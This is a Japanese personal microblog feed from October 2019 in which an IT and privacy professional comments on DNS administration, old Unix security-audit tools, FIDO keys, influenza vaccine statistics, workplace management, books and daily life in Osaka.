Messages

2019-10-31ちなみに、ハロウィーンは毎年のように「いつだっけ?」と忘れてしまうくらいの価値しかない。それに、ハロウィーンの前はカボチャを象った商品が増えるくらいの印象しかないし、ハロウィーンの後は渋谷の DJ ポリスの話題しか知らんなぁ。そういや、昨日(10/30)の夜に京阪東口を仮装してジョギングしてる一団がいたのだけれど、あれは何だったのだろうか。

2019-10-31japan times をコンビニエンス・ストアか地下鉄の売店で買いたいのだけれど、以前は地下鉄の売店で売っていたのに、最近はないらしい。販売している店舗を検索しても、10時に開店する書店ばかりだから出勤する途中に買えない。これでは買う気がしない。いちいち新聞を買うのに休憩時間を使ってジュンク堂まで歩く人なんていない。http://club.japantimes.co.jp/buy_japantimes/?item=JT&pref=27

2019-10-31風呂から上がって家の中を歩いていたら、床に置いてあったモニターを思い切り蹴ってしまい、足の親指の爪が割れてしまった。それから2週間ほどになる。もうすぐ、爪を切れば割れたところが目立たなくなるていどに伸びてきているのだが、下手に切ると爪が更に再び奥へと割れていってしまうため、爪ヤスリで処置した方がいいかもしれない。そういや、その隣の人差し指は、同じような事情で子供の頃に割れたのだった。それから何十年も経つのだが、どれほど爪を丁寧に切ったり爪ヤスリで処置しても、ずっと爪に縦の筋が入ったままだ。爪が割れるというアクシデントは、そうなるくらいには爪に強いダメージとなる。

2019-10-3115年以上も前の技術書だが、原理・原則が体系的に書いてあるため、現在でも所持するだけの価値があると思う。というか、僕は会社でこれを書架に置いて使っている。そもそも TCP/IP 上でプロトコルを利用したネットワークという点だけで言えば、最新の API だろうとストリーミング技術だろうと全て本書で理解できる範疇の、敢えて言うが《些末な応用》にすぎない。しかしそれでも、個々の規格なりプロトコルについては概略しか分からないので、DNS なら先に進んで(とは言っても、いわゆる「バッタ本」でも大して厳密なことは書いていないので)RFC そのものを読むといった展開が期待されている筈だと思う。技術者って、そういうものだろうし。更に、こういう体系的で総覧的と言ってもよい大著を一冊でも持っておくということには、学術的な観点から自分の利害関係や興味を越えた、目がくらむような未知の領域が広がっているという事実に打ちのめされるメリットがある。人というのは、若いうちは中二病でも、こうして自分の今の未熟さや限度に打ちのめされて大人になる方が良いのだ。そういう手順を踏まずに東大の学部ごときを出た程度の官僚や学者や政治家や IT 企業の経営者や意識高い系の主婦がいかに下らない蘊蓄だけの馬鹿揃いなのかは、皆さんもよくご存知であろう。『ネットワークスーパーテキスト(上)』(笠野英松、技術評論社、2003)ネットワークスーパーテキスト(上)

2019-10-31COPS と一緒に扱われているソフトウェアとして Kuang があるのだが、もう一つレポート作成用に CARP というソフトウェアが COPS のディストリビューションに同梱されているため、これの readme も訳しておきたい。

2019-10-31僕は、この絵柄のサザエさんが好きなんだよね。いかにも this is a Japanese という(良くも悪くも)田吾作の雰囲気があって邪気がない。おたからサザエさん 1巻https://www.amazon.co.jp/dp/4022589612/

2019-10-31僕もこれが不思議で、恐らくはターミナルから逆方向へ延伸したときに Y09 とか番号を付けられるようにしたのだろうと思っていた。あと、一桁の番号を使うと「Y09」と「Y9」という表記揺れが起きる可能性があると思う。勝手に padding を抜いてしまう人がいるんだよね。数字が11から始まっているのは将来の延伸に備えたためであるのと、駅番号を採用した乗り入れ路線と連番にするためである。https://ja.wikipedia.org/wiki/%E5%A4%A7%E9%98%AA%E5%B8%82%E5%96%B6%E5%9C%B0%E4%B8%8B%E9%89%84#%E9%A7%85%E7%95%AA%E5%8F%B7

2019-10-31んがしかし、新規で二件の作業が始まる。一つは受託案件で、広告用のリソースを ad network のサーバに取得させるためのサーバ(事実上のファイル・サーバみたいなもので、このサーバから直に広告を配信するわけではない)と、もう一つは自社のオンライン・サービスで既に公開されているインバウンド向けのサイトを、なぜかもう一つ作るらしい。今度は既存のサービス・サイトで使っているドメインのサブドメインで FQDN とするようだから、これは NS を管理している提携会社に IP アドレスを通知してレコードを向けてもらわないといけない。それにしても、いまだにドメインの管理とネームサーバの管理が必然的に同一だと思い込んでる人がいて、いちいち DNS の仕組みを専門学校の1年生レベルから説明しないといけない。前に IT リテラシー研修として何度も説明した筈だが、やはり常に使っていない知識は身に着かない。ということは、ネット・ベンチャーとは言っても IT やネットワークの知識を普段から使ってる社員なんて僅かしかいないという、弊社のような零細ベンチャーだろうと、楽天だろうとマイクソフトだろうと明々白々な事実に改めて突き当たるだけだ。

2019-10-31例のクーポン管理システムは、知らない間に二つほどクーポンが発行されていた。でも、クーポンは使われていない。まぁ、指定された居酒屋に行かなきゃ使う機会はないので、クーポンを発行したところで実際に使ってる割合って少ないかもしれないな。選ばないといけないから適当に選んでるだけで、実際にはクーポンなんてどうでもいいって人もいるだろうし。ともあれ、SAKURA のクラウドでサーバを二つも遊ばせてるわけではなくなったわけだ。

2019-10-31こういう事案はどんどん増えていくのだろう。日本では、いまだに専用線信仰というものがあるらしいけど、専用線を人知れずに敷設してるから安全だなんてのは、中学生がベッドの下にエロ本を隠してるのと同じ程度の《対策》だと知るべきだね。インターネットの回線を VPN ていどで結んでるのも、そんなに強い対策でもない。当社が VPN を使ってるのは単なるコストや利便性の問題だけだし、大きな価値がある知財をもつわけでもない中小零細企業の情報なんて実は大袈裟に保護するようなものでもないと知ってるからだ。(CPO が言うのは変かもしれないが、そういうリアリティや妥協は、他方での実務家や理論家としての理想なり目標と同じていどにはビジネスにおいて必要だ。)Indian nuclear power plant’s network was hacked, officials confirm

2019-10-31みんな恐る恐る接してるけどさ、個人が CRM のオンライン・サービスを立ち上げるって、そんなのシステムの運用に無理があるのは明白だと思うよ。CRM なんて「個人情報しかない」と言っていいくらいの情報資産を扱うソフトウェアなんだから。Online application can be made more simple, but the protection technolody of privacy should not. How do you implement things to keep secure? (asking from a person, not from my position as Chief Privacy Officer of company.)https://news.ycombinator.com/item?id=21403091

2019-10-31恐らく、Hacker News のコメントから引用した下記のような意見が正しいように思う。話題として取り上げられているページの方は "early retirement" について書いているわけだが、まぁこれはよく定年後のオッサンについて言われてきたことと同じだろう。特に日本では early retirement が殆ど事例としてなかったから誰も語ったり考えなかっただけであり、アメリカだとこうして early retirement が一つの理想だったから語るに値するのだろう。ただねぇ、トライし続けるのが《良い人生》なのかね。「一億総活躍社会」とか馬鹿げたことを言われている国では、そういう価値観を前提にされても困る。僕は、そういう思考には「カウボーイ病」とか「ジョブズ・カルト」という名称を与えたい。Not only early retirement but any kind of retirement that gets the retiree in a mode that they don't have to try anymore will result in cognitive decline.https://news.ycombinator.com/item?id=21401614

2019-10-31FIDO の規格を使った認証情報や認証方式のソリューションが続々と出てきている。これはこれで一つの進展であり、そのまま進展していくことを期待してもよいと思うのだが、やはり情報セキュリティの本質を忘れてしまってはいけない。認証情報の暗号論的な強度というものは、あくまでも資産を運用するにあたっての一つの基準にすぎず、こういう物理的なデバイスに恐ろしく高度な仕組みを搭載したところで、落としたり盗まれたら終わりだし、故障すればどうしようもなくなる(故障したときに、書類などで本人証明する代わりに、どこかのページへアクセスしてデバイスの再発行手続きを申請するために、同じていどの強度をもつデバイスを使うのか?)。認証情報というものは、往々にしてそういう機会に盗まれたり破壊されるのだ。https://paulstamatiou.com/getting-started-with-security-keys/

2019-10-31『ウォーゲーム』という古い映画で AI が全面核戦争を本当に実行すべきかどうか《熟考》した末に導き出した結論だ。どうやら Twitter と Facebook の対比を前提にしているようだが、さてどうなんだろうか。或る意味では利用者の問題として open question としておくのも一つの見識だが、しかし何らかの良好な事態へと収斂するまでのインターバルで引き上がるであろうリスクに誰が責任を負うのか。リバタリアンのような、高見の見物をしているとうぬぼれている人間のクズみたいな連中であれば、それは《われわれ人類》が自ら責任を負うのだと言ってのける(そら、自分たちは責任を負わなくていいところにいると思い込んでるのだから、幾らでも自己責任と言える)だろうけど、恐らくそういうリスクの被害者となりうる僕らはそんなわけにはいかない。A strange game. / The only winning move is not to play.https://twitter.com/pourmecoffee/status/1189638525345501194

2019-10-31モデルと言えば、よく素材で使われている女性を探してインタビューしている記事があった。当人は大阪のモデル事務所に所属していて、写真は Adobe Stock で見つかる素材らしい。Adobe CC は使ってるけど写真の素材サービスだけは別料金だから、使ったことなかったので知らんかったよ。美女素材で断トツ人気。ネット界の「ワンダーウーマン」が語る笑顔の裏側 - まぐまぐニュース!

2019-10-31出力した写真は商用でも自由に使えるとのことだが、それなりに安定した品質になっていて感心する。でも、たまたまでも俺と同じような外見の写真が出力されたらどうなんだろう。弁護士も絡んで記事を公開してるけど、第三者による請求については個別の判断になるしかないということであれば、出力された画像と似た外見の個人は自腹で訴える費用を捻出しなくてはならず、しかも常に先に《やられ放題》となるわけであるから、明らかに社会正義に反しているように思うけどね。まぁ、この手の業界もアダルトのモデル事務所と同じで事実上の風俗産業だから、期待するのも難しい話だろうけど。https://www.photo-ac.com/main/genface

2019-10-31この本、"2.0" とか "R1" とか書名についてるけど、結局は出版年の新しいものが最も新しい内容だと思っていればいいのだろう。でも、古本として出回り始めると混乱する恐れがある。"2.0" と "R1" という表記だけでは、前後関係を推定する根拠が何もないからだ。そもそも "R1" の "R" は何の略なのか、それなりに英語のセンスがある僕でも "release" や "revision" くらいは推測するけれど、こんな英語話者でも判断に迷うようなプライベートな基準で pragmatism を実行するのは感心しない。さすがは傲慢さだけが取り柄の大学にある出版社といったところか(まぁ同じような編集の傾向は大阪大学にもあるが)。ちなみに、内容そのものは一読に値する。net neutrality を扱った国内の書籍は本当に少なくて、特に技術系の出版社や日経のようなイエローメディアはベンチャーの裏話本か、テクノロジー万歳(あるいは敢えて逆張りでキーンやタークルやラニアーの懐疑主義)みたいなものばかり出すから、この手の本が賛否はともかくなかなか読まれないのは残念だ。なお、実積さんにはネットワーク中立性を真正面から取り上げた著作があるのだが、これは手に入り難いしアマゾンでもプレミアがついてしまっているので、書籍代に年間で数百万円を使える余裕があれば買った方がいいけれど、たいていは図書館で読むことを勧める。通信産業の経済学 R1(実積寿也、九州大学出版会、2019)https://www.amazon.co.jp/dp/4798502642/

2019-10-31数日前に、階段は昇るよりも降りる方が難しいという話を取り上げた。しかし「難しい」と言っているだけでは能がないので、やはり各人なりに工夫があろう。僕が心掛けているのは、(1) 階段をあまり凝視しない、(2) 階段は歩くものではなく落ちるものだと考える、という二点だ。まず降りながら段を一つずつ凝視しすぎると、同じ形をしている段を順番に追っている時は動態視力のエラーや錯覚が生じやすいので、逆に危険だと感じている。漠然と眺めるていどが良いと思う。そして、階段を前方に進む道のように考えてしまうと、どうしても踏み外すような感覚に陥りやすい。したがって、前方へ進む道という理解を捨てて、降りるときは《前方へ落下している》と強く自覚することが有効だ。

2019-10-31「寄与」とか「提案」って簡単に言うけど、では営業は何を提案できたというのかな。デタラメな試行錯誤か、二流マーケターの本をコピペしたような《戦略企画》を、顧客に向かって見せるのと同じイカサマを使って会議に出してくるだけだろ? システムやセキュリティ担当者が、しょーもない給料で新しいビジネスモデルでも発明してくれると思ってるなら、そういうチャレンジに見合う報酬を先に《投資》するのが経営者の役割だろう。いい加減、この手のネタで先にやりがいを搾取しておいて、残った実績だけでシステムやセキュリティや IT 人材全般を評価するという後出しジャンケンを続けるのは、やめたらどうか。そんなことで会社の業績なんて安定して上がるわけがない。アホみたいに自らすすんで徹夜する(しかも技術力がある)という幸運な人材か、徹夜しなくても会社の殆どの IT 案件を暇つぶしレベルとしてさばく僕のような天才(ちなみに何かの賞をとるとか発明する人材という意味ではなく、さほど修練もせずに軽々とこなせる天賦の能力があるという意味にすぎない)が入社するラッキーに賭けるしかなくなるからだ。Google や Facebook ていどの規模になれば、「歩留まり」で期待はできるかもしれないが、中小企業がこんな採用方針や評価基準をもつのは自殺行為である。この結果についてガートナーでは、自社の経営トップに認識されるIT部門の価値を高めるには、IT部門が構築したITが経営目標の達成にどう結び付いているかを示せること、かつそのようなITをビジネス部門からの提案を待つだけでなく、IT部門自らが提案できるようになることが重要だとした。https://japan.zdnet.com/article/35144685/

2019-10-31昔から色々な会社で聞くけど、勝手にランディングページや宣伝サイトを作っておいて、WordPress の投稿とかの運用だけ自分たちがしてたらいいという感覚の人がいるんだよね。そのサイトのセキュリティとか個人情報の取得とかどう考えてるのと指摘して初めて気づくレベルの社員は、正直なところ当社にはいらない。いや、バック・オフィスや役員なら別にその手のリテラシーが多少は低くてもいいけど、なんでそういう人材に限って営業とかマーケティングとかウェブディレクターになりがちなんだろうね、この国は。職能に求められる core competency の設定が明らかに間違ってるよ。営業と言えば馬鹿の一つ覚えみたいに「コミュ力」などと言うけれど、もうそんなのは core ですらない。口八丁なんてしょせんは属人的なものだし(それゆえ営業は昔から「歩留まり」が設定されている使い捨て部署なのだ)、優良誤認上等というか詐欺まがいのテクニックでしか食っていけない会社の人材に必要なだけのものでしかない。プロトコルなんて正しく教えたら社交性など関係なく習得できるものだし(僕は社交性などないと思っているが、薬店をしていた実家の手伝いで対面販売もしたし、居酒屋『酔虎伝』のホール担当や建材の営業もやってたし、雑誌の編集者として取材をやったこともある)、それすら難しい人は自閉症の人材を登用している事例のように内勤として配属すればいい。

2019-10-31高校化学の参考書をアマゾンで調べていると、『九州文化学園高校【長崎県】 予想問題集』という本が続々と検索結果に出てくる。これはノイズだろう。他に、高校の本物の教科書も発売されているのだが、配送元が「齋藤烈」という個人名なっているため、これはちょっと怪しい。教科書を一般人に販売できるのは特別な卸売り企業だけであり、大阪だと東成区に1社しかない。個人が今年出たばかりの教科書を勝手に販売できるわけがないし、卸売りの企業から購入して転売しているとしても、値段がそれほど高くないのは逆に不審である。2,000円ていどだと、卸売り企業で買う値段に殆ど儲けが乗っていないので、注文しても届くかどうか疑わしいからだ。新刊として出ている参考書は、さきほどジュンク堂でも眺めてきたのだが、『理系大学受験 化学の新研究 改訂版』(三省堂)が二色刷りで良さそうだ。この他にチャート式と、もう一冊の参考書を見ると、どちらも色が多すぎて何が重要なのか分からない。現役の高校時代も、僕はこの手の多色刷りはあまり評価していなかった。カラフルでないと読む気がしないなんて子供じみた感覚は、小学生の使う『自由自在』で卒業しようよ。中学にもなれば、最近は「学生」と呼ばれてるんだろ?

2019-10-30テナント・ビルのトイレにも、なんというか、"please make more step forward, your thing is not so long as you think" みたいなフレーズを掲示するべきではないのかね。なんであんなこぼす奴がいるの?

2019-10-30ていうか、いま試してみたら Chrome でも投稿できなかった。例の、背景にアホみたいなファンシー画像を付ける投稿スタイルだとタイムラインに出てきたし、コメントもぶら下げられたので、特定の投稿方式でないと何か問題があるんだろう。いずれにしても、Chrome がダメならそのうち同じエンジンになる Edge もダメだろうから、これはどうしようもないな。

2019-10-30もう、それなりに長い文章をいくら dismiss されたらいいのか。まったくもって時間の無駄としか言いようがない。Ghostery や uBlock Origin など、Firefox のブロッカーを全て解除して投稿してるのに、数か月ほど前から投稿が全く反映されずにデータが消えてしまう。しかも、普通のフォームならバックボタンでキャッシュが残ってることもあるけど、Ajax では投稿したデータなんて残らないので、取り返しがつかないんだよね。これ、会社の公式アカウントを運用してるんだけど、いまはシェアしかしてないからいいとして、何か書かなきゃいけなくなったらどうすればいいだろう。Edge か Chrome(どっちも同じエンジンになる予定だけど)でアクセスするように決めないといけないのかな。My post has never been properly accepted or submitted at Facebook, even I quit tools like Ghostery and uBlock Origin in my browser. So I will not put anything on Facebook timeline forever. It's absolutely a time wasting typing.#here

2019-10-30Thunderbolt Fantasy の外伝を映画で公開し始めたようだ。メイン・ストーリーも第三部があるというし、まだ先は長い。http://www.thunderboltfantasy.com/gaiden2/

2019-10-30最近になってやっと生じた意見の違いなんだろうか。利害関係のある企業に distribution を頼っていたこと自体がリスク管理の弱さを物語っている。ボランティアや慈善活動や社会運動であろうと、寄付や持ち出しが前提ではダメだよ。他人も同じような《善意》をもっていて協力してくれるという思い込みが、こういう NPO/NGO では最もカルトになりやすくて危険だからだ。結局、災害が起きて最も強力な支援活動ができるのは、日本でも海外でも軍隊であるという一点が明白な証拠だ。放射線治療機器や測定機器やフイルムバッジやガラスバッジなどの個人線量計を取り扱っていた千代田テクノル社は放射線安全管理総合情報誌(FB News)を全国に約3万部配布しているが、 その中に当会の会報も同封して郵送して頂いていたため、強力な広報手段として会報を全国に配布できた。 配布に当たっては医療機関だけでなく、原子力政策を推進する施設にも配布されていたため、私のようなICRP仮説の問題を指摘し、 脱原発に向けた発言が掲載されている会報を全国に配布することは会社として躊躇する状況が発生し、話し合いの結果、会報を休刊とする判断となった次第である。http://www.com-info.org/medical.php?ima_20191029_nishio

2019-10-30Twitter で「10/29 はインターネットの日」だと騒いでる人々の大半が単なるユーザで、インフラの技術者でもサーバのエンジニアでもないという様子が興味深い。Hacker News のようなサイトでも、特に誰もそんなことにちなむ記事なんて投稿しない。あたりまえである。10/29 なんて特定の日付には意味がないからだ。10 とか 29 という数字が通信規格に何か意味をもつのか? もたねーよ。そういうわけで、素人が騒ぐなら聞きかじりのインターネット通信に関するクソみたいな蘊蓄をツイートするんじゃなくてだな、通信規格やインフラを整備することに貢献した研究者や技術者に敬意を表してもらいたい。

2019-10-30ちなみに会社で話してても、メディアの "PR" と企業の "PR" を混同する人がいるんだよね。メディアは "press release" で、企業の広報で使う "PR" は "public relations" だ。もちろん企業が press release を出稿して広報することもあるし、メディアにとっての public relations は、メディアの運営企業自体に関する発表だ。

2019-10-30ていうか、日本版の Newsweek って企業のプレス・リリース配信もやってるのか。別に広告だと分かって掲載してるコンテンツだから構わないけれど、出稿する方も出稿する方で、えらく広告予算が潤沢なんだな。Newsweek の PR ページなんて、いったい誰が検索したりブックマークして見るというのか。ニューズウィーク日本版 オフィシャルサイト

2019-10-30このまえ亡くなった緒方貞子氏についての記事だが、この記事の前に読んだ Newsweek 日本版の記事よりもポイントが明解でよい記事だと思う。Newsweek の記事は、書いているのが女性だからか、やはりどうしても《女性》とか《母親》という点を繰り返して持ち込み、しかもそれが緒方氏の言動を正確に説明する効果的なポイントになっていない。結局は、女性だから男性よりも平和を望んだと言わんばかりの、《女性による女性のための女性についてのステレオタイプ》を繰り返しているだけのように思った。緒方貞子最大の功績。それは悲劇が生じた国から逃れようとも逃れられない人々を国内避難民として初めて国連による保護の対象にしたことにある。それまでも、当事国から出国した人々を難民条約に加盟する国は保護してきた。だが緒方は、出国できない難民も保護の対象としたのだ。その実現のために緒方が払った努力は並大抵のものではない。なぜなら、問題が生じた国に乗り込んで難民を保護すると言うことは、その国(大抵の場合、独裁的な行為が行われている国だ)に「内政干渉」すると言うことだからだ。史上最高級の国際人、緒方貞子が日本に残した栄光と宿題

2019-10-31この手の記事が事実上のキャッシュレス決済の宣伝であるという点は、ひとまず措こう。しかし、そもそも堂島の幾つかのコンビニエンス・ストアで見ていても、キャッシュレス決済で支払いをしている若者を殆ど見かけないんだよ。10人に1人すらいないね。この辺りなら NRI やら電通国際情報サービス、いやネット・ベンチャーやスマートフォンのゲーム開発ベンダーまで、リテラシーがありそうな社員を抱えた会社はたくさんあるけれど、スマートフォンを決済用の端末にかざしている人は見かけないね。ていうか、ジュンク堂なんかでクレジットカードで支払いする若者も少ないよ。アプリケーションとして普及してるかどうかは知らないけれど、とにかく現実の決済という場面では普及しているように見えない。これはまとめてみるとペイペイ(PayPay)のマーケティング戦略の失敗です。今、目の前の新規ユーザーが手に入れたいのは安心感なのに、会社としてはお得感を提供する還元キャンペーンだけに力を入れている。こうしてキャズムの前でサービスは伸び悩む一方で、私のようなアーリーアダプターはお得にビールを買って帰る、そんなアツい夏の日のひとこまが繰り広げられていたわけです。ペイペイ、大規模キャンペーンでも「人気いまいち」な意外すぎる理由(鈴木 貴博) @moneygendai

2019-10-30Amazon.co.jp で暫くのあいだ 2,000 円以下で売っていた technological singularity のアンソロジーが、さきほど確認すると 7,000 円になっていた。たまたま同好の方が買ったのだろう。破格の値段で売っていたのは、日本まで運んでからキャンセルされて在庫品となったものだろうから、同じようなチャンスはなかなかない。残念なことだが、誰かが購入して読んでいるだけでも良いことだとしたい。

2019-10-30そういや『新進研究者 Research Notes』って日本科学哲学会と科学基礎論学会とで合同の編集をやってるのか。PDF は日本科学哲学会のサーバに置いてるようだけど、これは両方の学会で合同の取り組みとして注目に値する。なお、どちらも科学哲学や科学基礎論に関連する学会なので、どうして二つもあるのかという印象を持つ人はいるかもしれない。僕は基礎論学会には入っていないし、日本科学哲学会も内情はよく知らないけれど、双方の学会は出自も志向も違っているようだ。したがって、特に合併する必要はないと思うのだが、双方に入会しているプロパーは多いため、重複した会員の比率(例えば会員の 95% が重複するとか)によっては、二重に会費を徴収する意味がないし、異なる学会誌を発行する意味もないため、合併した方が良いという判断もありうる。

2019-10-30Kuang の man ページを表示するための .man ファイルというのがある。制御用のマークアップがあるため、これを man page の体裁でコンソール画面に変換して表示したい。そもそも、man コマンドで扱うべきものだと思っていたのだが、man コマンドで .man ファイルを処理する方法が help に全く説明されておらず、検索しても拡張子に関する自動翻訳を使ったガラクタみたいな意味不明の日本で書かれたページか、あるいは英語でもクズみたいな拡張子解説のページがヒットするだけだ。このように、こんな基本的なことすら正確かつ正しく説明すらされていないのがネットのリソースの実情であって、Wikipedia(これは英語版のこと)の man ページに関するエントリーにすら .man ファイルについて何の解説もない。つまり日本だけの問題ではなく、アメリカを含む英語圏の人々の実情でもある。こういう事例って、実は UNIX/Linux の基本的な事項について調べると意外に多いという印象があるんだよね。ちなみに、man ファイルを less コマンドで整形して読めると書いている人がいるが、正確には「整形済みのファイルを読める」だけであり、FreeBSD で .man ファイルを整形しながら標準出力で読むなら mandoc を使うのが正しい。man2html も使ってみたが、正しく変換できなかった。というか、標準出力で HTML にされても仕方ない。

2019-10-30書名で検索してみて、アマゾンくらいならともかく、雑多な読書サイトや書籍の EC サイトしかヒットしないような本は、たぶん読まれていないか学術的には黙殺されている本だと見做していい。そういう本を敢えて読むかどうかは、殆ど信仰や趣味の問題であって、常識としてはきっぱり無視した方がよいし、たいていの人はそうする。もちろん、それぞれの人にとって読んだ方が良いと思われる、その人にとっての隠れた名著はあるかもしれないが、黙殺されている本の 99% は本当にクズみたいなものなのであって、学識も情報もない人が、そこから 1% を救い出すのは非常に難しい。よって、小説のように幸運ということはあるし(僕も、たまたま連れ合いが持っていなければ伊坂幸太郎の小説は一冊も読まなかっただろう)、たまたま誰かに勧められて当たりを引くこともある。なので、読書サイトや読書サークルや book review のブログなどは無駄なことではない。ただ、そういう情報ばかり探しても同じこと(book review のブログの大半もクズだからだ)になるので、評価されていない本の中で隠れた名著を探すために 1% に血道を上げるよりも、あからさまに評価が高い本(単に話題の本という意味ではなく、実際に高く評価されていることが分かる本)を読むべきである。古典を読むべきなのは、そういう理由からも明らかだ。よく、最初から古典的な業績を無視して、自分が隠れた名著の 1% を何であるか知っているか、知らなくても隠れた名著を見つけようとする乱読のようなものを《価値観の多様性》などと言う人がいるのだけれど、それは間違いだ。逆に、そういう人たちは 99% どころか 99.999999% がロクでもない結果か暇潰しに終わるだけなのであって、多様性どころか逆に高い精度で画一的な結果へ至るのだ。

2019-10-30もちろん、「インフルエンザ」とは言っても毎年のようにタイプが異なる疾患については、単純に数を数えるだけではいけないという理屈もあろう。しかし、それに対するワクチンの接種についても同じていどのバリエーションはある。結局、接種するワクチンなるものが、その年に流行する筈だと考えられたインフルエンザについての予測を元に決められたものであり、その予測が当たる年と外れた年の区別をしないといけないという事情もある。そして、予測が外れたときにどれほどしか効果がないのかという点を加味して、もし予測が当たっていればどの程度の効果があった筈なのかという数値を出して、推計として出せばいいだろう。もともと統計データの処理なんてものは、他の事柄についても同じような調整をして条件を揃えていくのが普通の手続きであり、理想的な正立方体のサイコロを振るような話(本来、確率論と統計学の違いはここにある)とはわけが違う。

2019-10-30いま、インフルエンザの資料を色々と見ている。接種にしても罹患にしても、どちらも定点観測からの推計でしかないため、行政ですら正確な数というものは恐らく持っていない筈である。したがってオンラインで検索する場合でも、推計に関する色々な論文やウェブページは出てくるのだが、その大半は具体的な数で議論したくないのか、折れ線グラフだけを掲載して数値を全く書かないものが大半だ(そして、そのグラフをどういう統計の数値をもとにして描いているのかすら分からない場合も多い)。これで科学と称しているのだから、ワクチン否定派に明解な反論ができないのも仕方ない。推計だろうと数値を堂々と示せばよいのであり、その推計というプロセス自体についても議論をすればいいのだが、推計結果の数字だけで語られると困るとか、正確な根拠のある値でないと使いたくないという中途半端な《科学者意識》が逆に陰謀論や denialist に付け入る隙を与えてきたのが、人類の未熟なアウトリーチの歴史というものである。今世紀に入って科学社会学や知識社会学や STS が何らかの寄与を為しうると思っていたが、はっきり言って大した成果はない。もちろん、本来は科学哲学も寄与しうる筈だが、PHILSCI.INFO で取り上げている津田さんのような疫学者と、ヒュームの解釈なんていう(実は)些末な話はともかく、逆に共同で何か研究してもよいのに、そうはならないのが残念だ。

2019-10-30インフルエンザのワクチンを忌避する人がいる一つの理由として、インフルエンザに罹患することを風邪と同じ程度に軽く見てる人が多いという事情があると思うんだよね。これはインフルエンザのワクチンを推奨する厚労省のキャンペーンが不足していて、広告屋がもっと頑張るべきことだ。そら、風邪を引くていどと思い込んでるようなこと(実は風邪もバカにはできないのだが)と、ワクチンの副作用として宣伝されてるような数々の症状を比較すれば、ワクチンを打たなくったって、せいぜい《風邪をひくていどのこと》しか起きないだろうと舐めてかかる人がいても仕方ない。ここで注意してほしいのは、僕は「親」とは言ってないということ。独身だろうと、自分自身がインフルエンザや風邪に罹患するということを舐めてる人はいて、そういう人に限って罹患してる可能性があるくせにマッチョ社員をアピールして出社してきて他人に感染させたりする。そんなのは単なる背任行為だ。

2019-10-30経営陣が何かをしていると組織全体にどういう影響があるかは、それほど単純ではない。はっきり言って、役員が徹夜してることなんて、いまどきは会社全体のパフォーマンスを上げる役には立たないんだよね。社長が3徹してるから俺らも電通案件で5日くらい徹夜・・・そんなの、ディーセント・ワークだのワーク・ライフ・バランスだのブラック企業だのと言われる以前の問題であって、(まともな)組織論や(まともな)社会心理学の観点から言って、もともとアホかという話でしかない。仮に、昔のように社員が一緒になって徹夜していくとしても、それで疲弊して事業継続性やスキルの継承など全くなくて消えていったウェブ制作会社がどれだけあったことか。だいたい、広告代理店なんてそういうことを折り込み済みで disposal なものとして扱っているのが、デザイン事務所やイベント会社やウェブ制作会社や開発ベンダーや芸能プロダクションなんだよ。逆に言うと、そうしないと広告なんて(しかも代理店という中間業者は)実は儲からないのだ。

2019-10-30具体的な内容は書かないでおくのだが、経営陣が適正に運用できない社内制度というのは(もちろん上場監査とかに関係があるほどの大きなことでもないが)、やめてしまうか他の部署に任せて自動化するなり一つの手順にまとめるなりした方がいいと思うんだよね。わざわざ人手を使ってやることに意味があると思ってるんだろうけど、その、わざわざ人の手を使ってやることがいい加減だと、社内制度を適用される方としては「あ、この会社って社員にはあれこれ言うけど、役員はいい加減にやっててもいいんだ」ってことになる。やはり組織というものは、上官としての規律や規範の実行が疎かだと全体としてパフォーマンスが低下するものであり、太平洋戦争や数々の上場企業の不祥事による倒産が明白な実例だ。

2019-10-30久しぶりに四つ橋線で出勤した。あいかわらず中央線は8:45くらいの時刻でも混んでいて、ちょうど本町あたりの会社に滑り込む人たちで混雑しているのだろう。それはともかく、肥後橋で下車してから渡辺橋を堂島に向かって歩いていると、左側通行がどうしたこうしたとつぶやきながら橋の欄干側を右側通行している人物がいる。アジア人のようだが、中国からの旅行客でもない(右側通行が慣例の中国人やアメリカ人、しかも旅行先の慣行を無視してもいいという傲慢な旅行客が日本で歩道の右側を歩くのは知ってる。どこの国にも無礼な人間はたくさんいる)。日本語を喋ってるし。またぞろ「車は左、人は右」というデタラメ(敗戦直後の道は確かに歩道も路側帯もなかったから、ドライバーから見えやすい右を歩く意味はあった。しかし、いずれにしても歩道のルールではないし、日本人が左側通行するのは法律と関係のない慣行だ。何も、僕も左側を歩くことが常に正しいなどと言ってはいない)を子供の頃に教え込まれたままアップデートしていない高齢者だろうか。いつもと違う時刻に歩くと、《こういうの》に出会うから有益だ。ただ、デカい声で一人で喋っていても、最近はイヤホンで通話してる馬鹿と、気の毒な自閉症患者との区別がつきにくい。それに、堂島なので朝から酩酊してる人がいないわけでもない。#歩行論

2019-10-30「実践的な」知識や現場で役に立つノウハウを無視してはいけない。それは確かだが、そればかりやってきたのが《この結果》なのだという事実は、日本の産業社会を考える際に真面目に受け止めた方がいい。というか卓袱台をひっくり返すようで恐縮な話だが、いったいわれわれ凡人は、実践的な知識だとか現場で役に立つノウハウすら、まともに築き上げてきたの?

2019-10-29Stewart の微分積分学を訳せるリソースがあるなら、Larson とか Blitzer とか Sullivan とか他にも定番の教科書はあるのだし、どこか他に訳す出版社はないだろうか。正直、日本のプロパーが書く中途半端なテキストは、毎年のように新しいものが出てくるのをジュンク堂で眺めるのだけれど、理論的にも雑だし演習は解答がないし、もうこんな低レベルなものを乱造されても無駄だ。それとも日本の大学の数学科で、微積分や線形代数や微分方程式のテキストを出版するのが准教授に昇格する条件にでもなっているのか。

2019-10-29連れ合いは「龍角散ののどすっきり飴」を臭いと言って遠ざけるのだが、かつて実家が薬店をやっていたせいか、僕はこういうのが好きだ。大正漢方胃腸薬とか、正露丸とか、なんでみんな臭いと言って嫌がるのだろう。

2019-10-29昨日は会社の業務マシンで、数百キロバイトの PNG 画像を Photoshop CC (20.0.7) で開こうとしたらマシンがハングしてしまった。画面が真っ黒になって操作不能となったため、電源ボタンで強制終了してから再開した。ログインしなおしてからは、念のため開こうとしていた PNG 画像はペイント 3D で保存しなおしておくと、問題なく開けた。

2019-10-29基礎論学会さんのサイトが 10/25 に更新している。それに合わせて、PHILSCI.INFO で動かしてる確認用のバッチ処理も、きちんとトップページの変化を検知して日付を更新しているようだ。これで問題なく動作していることになるかな。

